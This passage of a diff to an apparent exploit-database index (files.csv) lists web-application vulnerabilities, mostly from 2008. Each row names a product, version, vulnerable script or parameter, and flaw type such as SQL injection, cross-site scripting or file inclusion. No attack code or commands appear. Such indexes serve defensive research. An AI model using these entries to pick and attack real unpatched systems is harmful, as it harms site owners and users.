Injection",2008-02-15,"Alexandr Polyakov",php,webapps,0 31195,platforms/php/webapps/31195.txt,"Dokeos 1.8.4 - main/inc/lib/events.lib.inc.php Referer HTTP Header SQL Injection",2008-02-15,"Alexandr Polyakov",php,webapps,0 -31196,platforms/php/webapps/31196.txt,"Dokeos 1.8.4 - 'main/calendar/myagenda.php?courseCode' Cross-Site Scripting",2008-02-15,"Alexandr Polyakov",php,webapps,0 -31197,platforms/php/webapps/31197.txt,"Dokeos 1.8.4 - 'main/admin/course_category.php?category' Cross-Site Scripting",2008-02-15,"Alexandr Polyakov",php,webapps,0 -31198,platforms/php/webapps/31198.txt,"Dokeos 1.8.4 - 'main/admin/session_list.php?cmessage' Cross-Site Scripting",2008-02-15,"Alexandr Polyakov",php,webapps,0 -31199,platforms/php/webapps/31199.txt,"Dokeos 1.8.4 - 'main/mySpace/index.php?tracking_list_coaches_column' SQL Injection",2008-02-15,"Alexandr Polyakov",php,webapps,0 -31200,platforms/php/webapps/31200.txt,"Dokeos 1.8.4 - 'main/create_course/add_course.php?tutor_name' SQL Injection",2008-02-15,"Alexandr Polyakov",php,webapps,0 +31196,platforms/php/webapps/31196.txt,"Dokeos 1.8.4 - '/main/calendar/myagenda.php?courseCode' Cross-Site Scripting",2008-02-15,"Alexandr Polyakov",php,webapps,0 +31197,platforms/php/webapps/31197.txt,"Dokeos 1.8.4 - '/main/admin/course_category.php?category' Cross-Site Scripting",2008-02-15,"Alexandr Polyakov",php,webapps,0 +31198,platforms/php/webapps/31198.txt,"Dokeos 1.8.4 - '/main/admin/session_list.php?cmessage' Cross-Site Scripting",2008-02-15,"Alexandr Polyakov",php,webapps,0 +31199,platforms/php/webapps/31199.txt,"Dokeos 1.8.4 - '/main/mySpace/index.php?tracking_list_coaches_column' SQL Injection",2008-02-15,"Alexandr Polyakov",php,webapps,0 +31200,platforms/php/webapps/31200.txt,"Dokeos 1.8.4 - '/main/create_course/add_course.php?tutor_name' SQL Injection",2008-02-15,"Alexandr Polyakov",php,webapps,0 31201,platforms/php/webapps/31201.txt,"artmedic webdesign weblog - Multiple Local File Inclusions",2008-02-14,muuratsalo,php,webapps,0 31202,platforms/php/webapps/31202.txt,"PlutoStatus Locator 1.0pre alpha - 'index.php' Local File Inclusion",2008-02-14,muuratsalo,php,webapps,0 31206,platforms/php/webapps/31206.txt,"Joomla! / Mambo Component com_smslist - 'listid' SQL Injection",2008-02-15,S@BUN,php,webapps,0 @@ -32358,7 +32359,7 @@ id,file,description,date,author,platform,type,port 31217,platforms/php/webapps/31217.txt,"BanPro Dms 1.0 - 'index.php' Local File Inclusion",2008-02-16,muuratsalo,php,webapps,0 32241,platforms/php/webapps/32241.txt,"PHP Realty - 'dpage.php' SQL Injection",2008-08-13,CraCkEr,php,webapps,0 32242,platforms/php/webapps/32242.txt,"PHP-Fusion 4.01 - 'readmore.php' SQL Injection",2008-08-13,Rake,php,webapps,0 -32243,platforms/php/webapps/32243.txt,"Nukeviet 2.0 - 'admin/login.php' Cookie Authentication Bypass",2008-08-13,Ciph3r,php,webapps,0 +32243,platforms/php/webapps/32243.txt,"Nukeviet 2.0 - '/admin/login.php' Cookie Authentication Bypass",2008-08-13,Ciph3r,php,webapps,0 32244,platforms/php/webapps/32244.txt,"YapBB 1.2 - 'class_yapbbcooker.php' Remote File Inclusion",2008-08-13,CraCkEr,php,webapps,0 32245,platforms/php/webapps/32245.txt,"Nortel Networks SRG V16 - 'modules.php?module' Cross-Site Scripting",2008-08-13,CraCkEr,php,webapps,0 32246,platforms/php/webapps/32246.txt,"Nortel Networks SRG V16 - 'admin_modules.php?module' Traversal Local File Inclusion",2008-08-13,CraCkEr,php,webapps,0 @@ -32421,18 +32422,18 @@ id,file,description,date,author,platform,type,port 31297,platforms/php/webapps/31297.txt,"PHP-Nuke Sell Module - 'cid' SQL Injection",2008-02-25,"Aria-Security Team",php,webapps,0 31299,platforms/jsp/webapps/31299.txt,"Alkacon OpenCMS 7.0.3 - 'tree_files.jsp' Cross-Site Scripting",2008-02-25,nnposter,jsp,webapps,0 31303,platforms/php/webapps/31303.txt,"Joomla! / Mambo Component com_inter - 'id' SQL Injection",2008-02-25,The-0utl4w,php,webapps,0 -31304,platforms/php/webapps/31304.txt,"Plume CMS 1.2.2 - 'manager/xmedia.php' Cross-Site Scripting",2008-02-21,"Omer Singer",php,webapps,0 +31304,platforms/php/webapps/31304.txt,"Plume CMS 1.2.2 - '/manager/xmedia.php' Cross-Site Scripting",2008-02-21,"Omer Singer",php,webapps,0 31313,platforms/cgi/webapps/31313.txt,"Juniper Networks Secure Access 2000 Web - Root Full Path Disclosure",2008-02-28,"Richard Brain",cgi,webapps,0 31314,platforms/asp/webapps/31314.txt,"Flicks Software AuthentiX 6.3b1 - 'Username' Multiple Cross-Site Scripting Vulnerabilities",2008-02-28,"William Hicks",asp,webapps,0 31315,platforms/php/webapps/31315.txt,"XRms 1.99.2 - CRM 'msg' Cross-Site Scripting",2008-02-28,vijayv,php,webapps,0 31317,platforms/php/webapps/31317.txt,"NetOffice Dwins 1.3 - Authentication Bypass / Arbitrary File Upload",2008-02-29,RawSecurity.org,php,webapps,0 31318,platforms/php/webapps/31318.txt,"Centreon 1.4.2.3 - 'index.php' Local File Inclusion",2008-02-29,JosS,php,webapps,0 31319,platforms/php/webapps/31319.txt,"Simple PHP Scripts Gallery 0.x - 'index.php' Cross-Site Scripting",2008-02-29,ZoRLu,php,webapps,0 -31320,platforms/php/webapps/31320.txt,"PHPMyTourney 2 - 'tourney/index.php' Remote File Inclusion",2008-02-29,"HACKERS PAL",php,webapps,0 +31320,platforms/php/webapps/31320.txt,"PHPMyTourney 2 - '/tourney/index.php' Remote File Inclusion",2008-02-29,"HACKERS PAL",php,webapps,0 31321,platforms/php/webapps/31321.txt,"Heathco Software h2desk - Multiple Information Disclosure Vulnerabilities",2008-03-01,joseph.giron13,php,webapps,0 31322,platforms/php/webapps/31322.txt,"PHP-Nuke Johannes Hass 'Gaestebuch 2.2 Module - 'id' SQL Injection",2008-03-01,TurkishWarriorr,php,webapps,0 -31324,platforms/php/webapps/31324.txt,"KC Wiki 1.0 - 'minimal/wiki.php?page' Remote File Inclusion",2008-03-03,muuratsalo,php,webapps,0 -31325,platforms/php/webapps/31325.txt,"KC Wiki 1.0 - 'simplest/wiki.php?page' Remote File Inclusion",2008-03-03,muuratsalo,php,webapps,0 +31324,platforms/php/webapps/31324.txt,"KC Wiki 1.0 - '/minimal/wiki.php?page' Remote File Inclusion",2008-03-03,muuratsalo,php,webapps,0 +31325,platforms/php/webapps/31325.txt,"KC Wiki 1.0 - '/simplest/wiki.php?page' Remote File Inclusion",2008-03-03,muuratsalo,php,webapps,0 31326,platforms/php/webapps/31326.txt,"Flyspray 0.9.9 - Information Disclosure/HTML Injection / Cross-Site Scripting",2008-03-03,"Digital Security Research Group",php,webapps,0 31328,platforms/php/webapps/31328.txt,"TorrentTrader 1.08 - 'msg' HTML Injection",2008-03-03,Dominus,php,webapps,0 31329,platforms/multiple/webapps/31329.txt,"MediaWiki 1.22.1 PdfHandler - Remote Code Execution",2014-02-01,@u0x,multiple,webapps,0 @@ -32447,8 +32448,8 @@ id,file,description,date,author,platform,type,port 31353,platforms/php/webapps/31353.txt,"ImageVue 1.7 - 'dir2.php?path' Cross-Site Scripting",2008-03-07,ZoRLu,php,webapps,0 31354,platforms/php/webapps/31354.txt,"ImageVue 1.7 - 'upload.php?path' Cross-Site Scripting",2008-03-07,ZoRLu,php,webapps,0 31355,platforms/php/webapps/31355.txt,"ImageVue 1.7 - 'dirxml.php?path' Cross-Site Scripting",2008-03-07,ZoRLu,php,webapps,0 -31356,platforms/php/webapps/31356.txt,"WordPress 2.3.2 - 'wp-admin/users.php?inviteemail' Cross-Site Scripting",2008-03-07,Doz,php,webapps,0 -31357,platforms/php/webapps/31357.txt,"WordPress 2.3.2 - 'wp-admin/invites.php?to' Cross-Site Scripting",2008-03-07,Doz,php,webapps,0 +31356,platforms/php/webapps/31356.txt,"WordPress 2.3.2 - '/wp-admin/users.php?inviteemail' Cross-Site Scripting",2008-03-07,Doz,php,webapps,0 +31357,platforms/php/webapps/31357.txt,"WordPress 2.3.2 - '/wp-admin/invites.php?to' Cross-Site Scripting",2008-03-07,Doz,php,webapps,0 31358,platforms/php/webapps/31358.txt,"Specimen Image Database - 'taxonservice.php?dir' Remote File Inclusion",2008-03-07,ZoRLu,php,webapps,0 31365,platforms/php/webapps/31365.txt,"Alkacon OpenCMS 7.0.3 - logfileViewSettings.jsp filePath Parameter Cross-Site Scripting",2008-03-08,nnposter,php,webapps,0 31366,platforms/php/webapps/31366.txt,"Alkacon OpenCMS 7.0.3 - logfileViewSettings.jsp filePath.0 Parameter Arbitrary File Access",2008-03-08,nnposter,php,webapps,0 @@ -32505,8 +32506,8 @@ id,file,description,date,author,platform,type,port 31441,platforms/php/webapps/31441.txt,"MyBlog 1.x - SQL Injection / Remote File Inclusion",2008-03-19,Cod3rZ,php,webapps,0 31442,platforms/asp/webapps/31442.txt,"Iatek PortalApp 4.0 - 'links.asp' SQL Injection",2008-03-19,xcorpitx,asp,webapps,0 31443,platforms/php/webapps/31443.txt,"CS-Cart 1.3.2 - 'index.php' Cross-Site Scripting",2008-03-19,sasquatch,php,webapps,0 -31445,platforms/jsp/webapps/31445.txt,"Elastic Path 4.1 - 'manager/getImportFileRedirect.jsp' file Parameter Traversal Arbitrary File Access",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0 -31446,platforms/jsp/webapps/31446.txt,"Elastic Path 4.1 - 'manager/FileManager.jsp?dir' Traversal Arbitrary Directory Listing",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0 +31445,platforms/jsp/webapps/31445.txt,"Elastic Path 4.1 - '/manager/getImportFileRedirect.jsp' file Parameter Traversal Arbitrary File Access",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0 +31446,platforms/jsp/webapps/31446.txt,"Elastic Path 4.1 - '/manager/FileManager.jsp?dir' Traversal Arbitrary Directory Listing",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0 31447,platforms/php/webapps/31447.txt,"News-Template 0.5beta - 'print.php' Multiple Cross-Site Scripting Vulnerabilities",2008-03-20,ZoRLu,php,webapps,0 31448,platforms/php/webapps/31448.txt,"Joomla! / Mambo Component Datsogallery 1.3.1 - 'id' SQL Injection",2008-03-20,Cr@zy_King,php,webapps,0 31449,platforms/php/webapps/31449.txt,"W-Agora 4.0 - 'add_user.php' bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 @@ -32520,8 +32521,8 @@ id,file,description,date,author,platform,type,port 31457,platforms/php/webapps/31457.txt,"W-Agora 4.0 - 'reorder_forums.php' bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 31458,platforms/php/webapps/31458.txt,"PHP Webcam Video Conference - Multiple Vulnerabilities",2014-02-06,vinicius777,php,webapps,80 31459,platforms/php/webapps/31459.txt,"Joomla! 3.2.1 - SQL Injection",2014-02-06,killall-9,php,webapps,80 -31469,platforms/php/webapps/31469.txt,"ooComments 1.0 - 'classes/class_admin.php?PathToComment' Remote File Inclusion",2008-03-22,ZoRLu,php,webapps,0 -31470,platforms/php/webapps/31470.txt,"ooComments 1.0 - 'classes/class_comments.php?PathToComment' Remote File Inclusion",2008-03-22,ZoRLu,php,webapps,0 +31469,platforms/php/webapps/31469.txt,"ooComments 1.0 - '/classes/class_admin.php?PathToComment' Remote File Inclusion",2008-03-22,ZoRLu,php,webapps,0 +31470,platforms/php/webapps/31470.txt,"ooComments 1.0 - '/classes/class_comments.php?PathToComment' Remote File Inclusion",2008-03-22,ZoRLu,php,webapps,0 31471,platforms/php/webapps/31471.txt,"TinyPortal 0.8.6/1.0.3 - 'index.php' Cross-Site Scripting",2008-03-22,Y433r,php,webapps,0 31472,platforms/php/webapps/31472.txt,"cPanel 11.18.3/11.21 - 'manpage.html' Cross-Site Scripting",2008-03-22,Linux_Drox,php,webapps,0 31475,platforms/jsp/webapps/31475.txt,"Alkacon OpenCMS 7.0.3 - 'users_list.jsp' Multiple Cross-Site Scripting Vulnerabilities",2008-03-24,nnposter,jsp,webapps,0 @@ -32541,7 +32542,7 @@ id,file,description,date,author,platform,type,port 31492,platforms/php/webapps/31492.txt,"Quick Classifieds 1.0 - controlpannel/alterCats.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 31493,platforms/php/webapps/31493.txt,"Quick Classifieds 1.0 - controlpannel/alterFeatured.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 31494,platforms/php/webapps/31494.txt,"Quick Classifieds 1.0 - controlpannel/alterHomepage.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31495,platforms/php/webapps/31495.txt,"Quick Classifieds 1.0 - 'controlpannel/alterNews.php3' DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31495,platforms/php/webapps/31495.txt,"Quick Classifieds 1.0 - '/controlpannel/alterNews.php3' DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 31496,platforms/php/webapps/31496.txt,"Quick Classifieds 1.0 - controlpannel/alterTheme.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 31497,platforms/php/webapps/31497.txt,"Quick Classifieds 1.0 - controlpannel/color_help.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 31498,platforms/php/webapps/31498.txt,"Quick Classifieds 1.0 - controlpannel/createdb.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 @@ -32549,7 +32550,7 @@ id,file,description,date,author,platform,type,port 31500,platforms/php/webapps/31500.txt,"Quick Classifieds 1.0 - controlpannel/createHomepage.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 31501,platforms/php/webapps/31501.txt,"Quick Classifieds 1.0 - controlpannel/createL.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 31502,platforms/php/webapps/31502.txt,"Quick Classifieds 1.0 - controlpannel/createM.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31503,platforms/php/webapps/31503.txt,"Quick Classifieds 1.0 - 'controlpannel/createNews.php3' DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31503,platforms/php/webapps/31503.txt,"Quick Classifieds 1.0 - '/controlpannel/createNews.php3' DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 31504,platforms/php/webapps/31504.txt,"Quick Classifieds 1.0 - controlpannel/createP.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 31505,platforms/php/webapps/31505.txt,"Quick Classifieds 1.0 - controlpannel/createS.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 31506,platforms/php/webapps/31506.txt,"Quick Classifieds 1.0 - controlpannel/createT.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 @@ -32591,8 +32592,8 @@ id,file,description,date,author,platform,type,port 31569,platforms/hardware/webapps/31569.txt,"D-Link DSL-2750B ADSL Route) - Cross-Site Request Forgery",2014-02-11,killall-9,hardware,webapps,80 31570,platforms/php/webapps/31570.txt,"WordPress Plugin Frontend Upload - Arbitrary File Upload",2014-02-11,"Daniel Godoy",php,webapps,80 31571,platforms/php/webapps/31571.txt,"WordPress Plugin BuddyPress 1.9.1 - Privilege Escalation",2014-02-11,"Pietro Oliva",php,webapps,80 -32215,platforms/php/webapps/32215.txt,"RMSOFT Downloads Plus - '(rmdp) 1.5/1.7 Module for XOOPS search.php?key' Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0 -32216,platforms/php/webapps/32216.txt,"RMSOFT Downloads Plus - '(rmdp) 1.5/1.7 Module for XOOPS down.php?id' Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0 +32215,platforms/php/webapps/32215.txt,"RMSOFT Downloads Plus - '/(rmdp) 1.5/1.7 Module for XOOPS search.php?key' Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0 +32216,platforms/php/webapps/32216.txt,"RMSOFT Downloads Plus - '/(rmdp) 1.5/1.7 Module for XOOPS down.php?id' Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0 31573,platforms/ios/webapps/31573.txt,"WiFi Camera Roll 1.2 iOS - Multiple Vulnerabilities",2014-02-11,Vulnerability-Lab,ios,webapps,8880 31578,platforms/windows/webapps/31578.txt,"Tableau Server - Blind SQL Injection",2014-02-11,"Trustwave's SpiderLabs",windows,webapps,80 31579,platforms/windows/webapps/31579.txt,"Titan FTP Server 10.32 Build 1816 - Directory Traversal",2014-02-11,"Fara Rustein",windows,webapps,0 @@ -32641,10 +32642,10 @@ id,file,description,date,author,platform,type,port 31646,platforms/asp/webapps/31646.txt,"Cezanne 6.5.1/7 - 'home.asp?CFTARGET' Cross-Site Scripting",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0 31647,platforms/multiple/webapps/31647.txt,"CA 2E Web Option 8.1.2 - Authentication Bypass",2014-02-13,"Mike Emery",multiple,webapps,0 31648,platforms/asp/webapps/31648.txt,"Cezanne 7 - 'cflookup.asp?FUNID' SQL Injection",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0 -31649,platforms/asp/webapps/31649.txt,"Cezanne 7 - 'CznCommon/CznCustomContainer.asp?FUNID' SQL Injection",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0 +31649,platforms/asp/webapps/31649.txt,"Cezanne 7 - '/CznCommon/CznCustomContainer.asp?FUNID' SQL Injection",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0 31650,platforms/asp/webapps/31650.txt,"Cezanne Software 6.5.1/7 - 'CFLogon.asp' Cross-Site Scripting",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0 -31651,platforms/php/webapps/31651.txt,"amfPHP 1.2 - 'browser/methodTable.php?class' Cross-Site Scripting",2008-04-15,"Alberto Cuesta Partida",php,webapps,0 -31652,platforms/php/webapps/31652.txt,"amfPHP 1.2 - 'browser/code.php' Multiple Cross-Site Scripting Vulnerabilities",2008-04-15,"Alberto Cuesta Partida",php,webapps,0 +31651,platforms/php/webapps/31651.txt,"amfPHP 1.2 - '/browser/methodTable.php?class' Cross-Site Scripting",2008-04-15,"Alberto Cuesta Partida",php,webapps,0 +31652,platforms/php/webapps/31652.txt,"amfPHP 1.2 - '/browser/code.php' Multiple Cross-Site Scripting Vulnerabilities",2008-04-15,"Alberto Cuesta Partida",php,webapps,0 31653,platforms/php/webapps/31653.txt,"amfPHP 1.2 - browser/details class Parameter Cross-Site Scripting",2008-04-15,"Alberto Cuesta Partida",php,webapps,0 31654,platforms/php/webapps/31654.txt,"W2B Online Banking - 'ilang' Remote File Inclusion",2008-04-15,THuM4N,php,webapps,0 31655,platforms/php/webapps/31655.txt,"Istant-Replay - 'read.php' Remote File Inclusion",2008-04-15,THuGM4N,php,webapps,0 @@ -32678,12 +32679,12 @@ id,file,description,date,author,platform,type,port 31693,platforms/ios/webapps/31693.txt,"File Hub 1.9.1 iOS - Multiple Vulnerabilities",2014-02-16,Vulnerability-Lab,ios,webapps,8080 31702,platforms/php/webapps/31702.txt,"PHP-Nuke DownloadsPlus Module - Arbitrary File Upload",2008-04-24,ZoRLu,php,webapps,0 31703,platforms/php/webapps/31703.txt,"Pixel Motion Blog - 'list_article.php' Cross-Site Scripting",2008-04-24,ZoRLu,php,webapps,0 -31704,platforms/php/webapps/31704.txt,"PHCDownload 1.1 - 'admin/index.php?hash' SQL Injection",2008-04-24,ZoRLu,php,webapps,0 -31705,platforms/php/webapps/31705.txt,"PHCDownload 1.1 - 'upload/install/index.php?step' Cross-Site Scripting",2008-04-24,ZoRLu,php,webapps,0 +31704,platforms/php/webapps/31704.txt,"PHCDownload 1.1 - '/admin/index.php?hash' SQL Injection",2008-04-24,ZoRLu,php,webapps,0 +31705,platforms/php/webapps/31705.txt,"PHCDownload 1.1 - '/upload/install/index.php?step' Cross-Site Scripting",2008-04-24,ZoRLu,php,webapps,0 31708,platforms/php/webapps/31708.txt,"Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion",2008-04-26,NoGe,php,webapps,0 31709,platforms/php/webapps/31709.txt,"Siteman 2.0.x2 - 'module' Cross-Site Scripting / Local File Inclusion",2008-04-26,"Khashayar Fereidani",php,webapps,0 31716,platforms/php/webapps/31716.txt,"VWar 1.6.1 R2 - Multiple Remote Vulnerabilities",2008-05-01,"Darren McDonald",php,webapps,0 -31717,platforms/php/webapps/31717.txt,"MJGUEST 6.7 - QT 'mjguest.php' Cross-Site Scripting",2008-05-01,"Khashayar Fereidani",php,webapps,0 +31717,platforms/php/webapps/31717.txt,"MJGUEST 6.7 - 'QT 'mjguest.php' Cross-Site Scripting",2008-05-01,"Khashayar Fereidani",php,webapps,0 31719,platforms/php/webapps/31719.pl,"KnowledgeQuest 2.6 - Administration Multiple Authentication Bypass Vulnerabilities",2008-05-02,Cod3rZ,php,webapps,0 31720,platforms/php/webapps/31720.txt,"QT-cute QuickTalk Guestbook 1.6 - Multiple Cross-Site Scripting Vulnerabilities",2008-05-02,ZoRLu,php,webapps,0 31721,platforms/php/webapps/31721.txt,"EJ3 BlackBook 1.0 - 'footer.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-02,"Khashayar Fereidani",php,webapps,0 @@ -32694,9 +32695,9 @@ id,file,description,date,author,platform,type,port 31726,platforms/php/webapps/31726.txt,"Zen Cart 2008 - 'index.php' keyword Parameter Cross-Site Scripting",2008-05-02,"Ivan Sanchez",php,webapps,0 31727,platforms/php/webapps/31727.txt,"Chicomas 2.0.4 - 'index.php' Cross-Site Scripting",2008-05-02,"Hadi Kiamarsi",php,webapps,0 31729,platforms/php/webapps/31729.pl,"SiteXS CMS 0.1.1 - 'upload.php' Arbitrary File Upload",2008-05-03,"Hadi Kiamarsi",php,webapps,0 -31730,platforms/php/webapps/31730.txt,"GEDCOM_TO_MYSQL - 'PHP/prenom.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-05,ZoRLu,php,webapps,0 -31731,platforms/php/webapps/31731.txt,"GEDCOM_TO_MYSQL - 'PHP/index.php?nom_branche' Cross-Site Scripting",2008-05-05,ZoRLu,php,webapps,0 -31732,platforms/php/webapps/31732.txt,"GEDCOM_TO_MYSQL - 'PHP/info.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-05,ZoRLu,php,webapps,0 +31730,platforms/php/webapps/31730.txt,"GEDCOM_TO_MYSQL - '/PHP/prenom.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-05,ZoRLu,php,webapps,0 +31731,platforms/php/webapps/31731.txt,"GEDCOM_TO_MYSQL - '/PHP/index.php?nom_branche' Cross-Site Scripting",2008-05-05,ZoRLu,php,webapps,0 +31732,platforms/php/webapps/31732.txt,"GEDCOM_TO_MYSQL - '/PHP/info.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-05,ZoRLu,php,webapps,0 31733,platforms/ios/webapps/31733.txt,"My PDF Creator & DE DM 1.4 iOS - Multiple Vulnerabilities",2014-02-18,Vulnerability-Lab,ios,webapps,50496 32240,platforms/php/webapps/32240.txt,"Freeway 1.4.1 - Multiple Input Validation Vulnerabilities",2008-08-13,"Digital Security Research Group",php,webapps,0 31734,platforms/php/webapps/31734.txt,"Pina CMS - Multiple Vulnerabilities",2014-02-18,"Shadman Tanjim",php,webapps,80 @@ -32761,9 +32762,9 @@ id,file,description,date,author,platform,type,port 31813,platforms/php/webapps/31813.txt,"eCMS 0.4.2 - Multiple Vulnerabilities",2008-05-20,hadihadi,php,webapps,0 31816,platforms/java/webapps/31816.txt,"SAP Web Application Server 7.0 - '/sap/bc/gui/sap/its/webgui/' Cross-Site Scripting",2008-05-21,DSecRG,java,webapps,0 31821,platforms/php/webapps/31821.txt,"PHPFreeForum 1.0 rc2 - 'error.php?message' Cross-Site Scripting",2008-05-22,tan_prathan,php,webapps,0 -31822,platforms/php/webapps/31822.txt,"PHPFreeForum 1.0 rc2 - 'part/menu.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-22,tan_prathan,php,webapps,0 -31823,platforms/php/webapps/31823.txt,"phpSQLiteCMS 1 RC2 - 'cms/includes/header.inc.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-22,"CWH Underground",php,webapps,0 -31824,platforms/php/webapps/31824.txt,"phpSQLiteCMS 1 RC2 - 'cms/includes/login.inc.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-22,"CWH Underground",php,webapps,0 +31822,platforms/php/webapps/31822.txt,"PHPFreeForum 1.0 rc2 - '/part/menu.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-22,tan_prathan,php,webapps,0 +31823,platforms/php/webapps/31823.txt,"phpSQLiteCMS 1 RC2 - '/cms/includes/header.inc.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-22,"CWH Underground",php,webapps,0 +31824,platforms/php/webapps/31824.txt,"phpSQLiteCMS 1 RC2 - '/cms/includes/login.inc.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-22,"CWH Underground",php,webapps,0 31825,platforms/php/webapps/31825.txt,"BMForum 5.6 - 'index.php' Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0 31826,platforms/php/webapps/31826.txt,"BMForum 5.6 - 'bsd01footer.php' Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0 31827,platforms/php/webapps/31827.txt,"BMForum 5.6 - 'bsd01header.php' Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0 @@ -32781,15 +32782,15 @@ id,file,description,date,author,platform,type,port 31841,platforms/php/webapps/31841.txt,"miniCWB 2.1.1 - 'connector.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-26,"CWH Underground",php,webapps,0 31842,platforms/php/webapps/31842.txt,"AbleSpace 1.0 - 'adv_cat.php' SQL Injection",2008-05-26,Jasbi,php,webapps,0 31843,platforms/asp/webapps/31843.txt,"Excuse Online - 'pwd.asp' SQL Injection",2008-05-26,Unohope,asp,webapps,0 -31844,platforms/php/webapps/31844.txt,"PHPFix 2.0 - 'fix/browse.php?kind' SQL Injection",2008-05-26,Unohope,php,webapps,0 -31845,platforms/php/webapps/31845.txt,"PHPFix 2.0 - 'auth/00_pass.php?account' SQL Injection",2008-05-26,Unohope,php,webapps,0 +31844,platforms/php/webapps/31844.txt,"PHPFix 2.0 - '/fix/browse.php?kind' SQL Injection",2008-05-26,Unohope,php,webapps,0 +31845,platforms/php/webapps/31845.txt,"PHPFix 2.0 - '/auth/00_pass.php?account' SQL Injection",2008-05-26,Unohope,php,webapps,0 31846,platforms/php/webapps/31846.txt,"ClassSystem 2.0/2.3 - 'HomepageTop.php?teacher_id' SQL Injection",2008-05-26,Unohope,php,webapps,0 31847,platforms/php/webapps/31847.txt,"ClassSystem 2.0/2.3 - 'HomepageMain.php?teacher_id' SQL Injection",2008-05-26,Unohope,php,webapps,0 31848,platforms/php/webapps/31848.txt,"ClassSystem 2.0/2.3 - 'MessageReply.php?teacher_id' SQL Injection",2008-05-26,Unohope,php,webapps,0 31849,platforms/php/webapps/31849.html,"ClassSystem 2.0/2.3 - class/ApplyDB.php Unrestricted Arbitrary File Upload / Arbitrary Code Execution",2008-05-26,Unohope,php,webapps,0 -31850,platforms/asp/webapps/31850.txt,"Campus Bulletin Board 3.4 - 'post3/book.asp?review' Cross-Site Scripting",2008-05-26,Unohope,asp,webapps,0 -31851,platforms/asp/webapps/31851.txt,"Campus Bulletin Board 3.4 - 'post3/view.asp?id' SQL Injection",2008-05-26,Unohope,asp,webapps,0 -31852,platforms/asp/webapps/31852.txt,"Campus Bulletin Board 3.4 - 'post3/book.asp?review' SQL Injection",2008-05-26,Unohope,asp,webapps,0 +31850,platforms/asp/webapps/31850.txt,"Campus Bulletin Board 3.4 - '/post3/book.asp?review' Cross-Site Scripting",2008-05-26,Unohope,asp,webapps,0 +31851,platforms/asp/webapps/31851.txt,"Campus Bulletin Board 3.4 - '/post3/view.asp?id' SQL Injection",2008-05-26,Unohope,asp,webapps,0 +31852,platforms/asp/webapps/31852.txt,"Campus Bulletin Board 3.4 - '/post3/book.asp?review' SQL Injection",2008-05-26,Unohope,asp,webapps,0 31854,platforms/asp/webapps/31854.html,"The Campus Request Repairs System 1.2 - 'sentout.asp' Unauthorized Access",2008-05-26,Unohope,asp,webapps,0 31855,platforms/php/webapps/31855.txt,"Tr Script News 2.1 - 'news.php' Cross-Site Scripting",2008-05-27,ZoRLu,php,webapps,0 31857,platforms/php/webapps/31857.txt,"Joomla! / Mambo Component Artists - 'idgalery' SQL Injection",2008-05-28,Cr@zy_King,php,webapps,0 @@ -32819,7 +32820,7 @@ id,file,description,date,author,platform,type,port 31900,platforms/ios/webapps/31900.txt,"Private Camera Pro 5.0 iOS - Multiple Vulnerabilities",2014-02-25,Vulnerability-Lab,ios,webapps,0 31902,platforms/php/webapps/31902.txt,"Noticia Portal - 'detalle_noticia.php' SQL Injection",2008-06-10,t@nzo0n,php,webapps,0 31904,platforms/php/webapps/31904.txt,"PHPEasyData 1.5.4 - 'annuaire.php?annuaire' SQL Injection",2008-06-11,"Sylvain THUAL",php,webapps,0 -31905,platforms/php/webapps/31905.txt,"PHPEasyData 1.5.4 - 'admin/login.php 